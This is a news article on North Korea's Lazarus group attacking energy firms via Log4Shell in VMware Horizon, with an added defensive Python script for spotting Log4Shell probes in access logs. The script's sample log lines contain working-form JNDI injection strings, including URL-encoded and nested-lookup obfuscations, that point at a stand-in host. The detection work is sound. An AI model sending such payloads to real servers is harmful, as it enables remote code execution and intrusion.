Energy providers in several countries, including the United States, Canada and Japan, have reportedly been targeted by the North Korean state-sponsored hacker group Lazarus, also tracked as APT38.
According to Cisco's Talos Intelligence group, the campaign aims to infiltrate organizations around the world in order to establish long-term access and then exfiltrate data of interest to the North Korean state.
While the precise targets have not been named, the attacks demonstrate once again the threat that North Korea and Lazarus pose to critical infrastructure.
How did the attack work?
According to Talos, the campaign gained its initial foothold in targeted organizations by exploiting a vulnerability in internet-exposed VMware Horizon servers, the company's virtual desktop product.
After gaining access to the targeted corporate networks, the group deployed custom malware implants, including the known backdoors VSingle and YamaBot.
Alongside these known malware families, Talos also reported discovering a previously undocumented implant it named "MagicRAT".
The initial access was reportedly achieved through Log4Shell (CVE-2021-44228), a remote code execution vulnerability in Log4j, a widely used Java logging framework bundled with Horizon. Log4Shell was a zero-day when it was disclosed in December 2021, but patches had long been available by the time of this campaign; the affected organizations were running unpatched Horizon servers.
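Log4Shell is triggered when attacker-controlled text containing a `${jndi:...}` lookup is written to a log by a vulnerable Log4j version, which then resolves the lookup and loads remote code. A practitioner reviewing Horizon or reverse-proxy access logs for this kind of initial access wants a check that also catches the URL-encoded and nested-lookup obfuscations attackers use to slip past naive string matching. The following is an added example, not code from the article or from Talos; the log lines are constructed for illustration, and the function names (`normalize`, `is_log4shell_probe`, `scan`) are assumptions of this example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the Talos report):
# a benign request, a plain JNDI lookup in the User-Agent, a URL-encoded
# lookup in the query string, and a nested-lookup obfuscated variant.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [23/Aug/2022:10:01:02 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Aug/2022:10:01:05 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [23/Aug/2022:10:01:06 +0000] "GET /portal/?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.7 - - [23/Aug/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}di:${lower:r}mi://203.0.113.7:1099/c}"',
]

# Innermost ${...} lookup: no nested $, { or } inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup using one of the protocols Log4j's JNDI lookup can resolve.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\s*:", re.IGNORECASE)


def _simplify(inner: str) -> str:
    """Collapse one innermost lookup the way Log4j would evaluate it.

    ${lower:J} -> j, ${upper:j} -> J, ${env:UNSET:-j} and ${::-j} -> j.
    A jndi lookup or an unknown lookup is left as-is (hypothetical reduction
    rules covering the obfuscations most commonly seen in the wild)."""
    stripped = inner.strip()
    if stripped.lower().startswith("jndi"):
        return "${" + inner + "}"
    if ":-" in stripped:                       # default-value syntax
        return stripped.split(":-", 1)[1]
    key, sep, value = stripped.partition(":")
    if sep and key.lower() == "lower":
        return value.lower()
    if sep and key.lower() == "upper":
        return value.upper()
    return "${" + inner + "}"


def normalize(text: str, max_rounds: int = 5) -> str:
    """URL-decode repeatedly, then reduce nested lookups until stable."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        reduced = _INNER.sub(lambda m: _simplify(m.group(1)), text)
        if reduced == text:
            break
        text = reduced
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return the indices of lines that look like Log4Shell probes."""
    return [i for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_LOG_LINES):
        print(f"suspicious line {idx}: {normalize(SAMPLE_LOG_LINES[idx])}")
```

Two caveats apply. A hit only shows that a lookup string reached a log, not that it was resolved: on a patched Log4j release (2.17.x or later) the same line is harmless, so the finding has to be paired with the Log4j version actually running in Horizon. And the reduction rules above cover only the common `lower`, `upper` and default-value tricks; any lookup the normalizer does not understand is left in place, which means the check errs toward false negatives rather than false positives and should be treated as a triage aid, not a complete detection.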
Cybersecurity firm Tenable previously called Log4Shell “the largest, most critical vulnerability ever”.
This would not be the first time North Korea has been linked to attacks on foreign targets: Kaspersky Lab researchers tied North Korea to the WannaCry ransomware outbreak, which infected some 300,000 computers in 150 countries and caused unprecedented disruption to the UK's NHS.
Since its emergence around 2010, the Lazarus group has been remarkably prolific, and it has lately turned its attention to blockchains and DeFi.
Lazarus was linked to the $615 million theft from the Ronin sidechain that powers the popular blockchain-integrated game Axie Infinity, one of the largest DeFi hacks to date.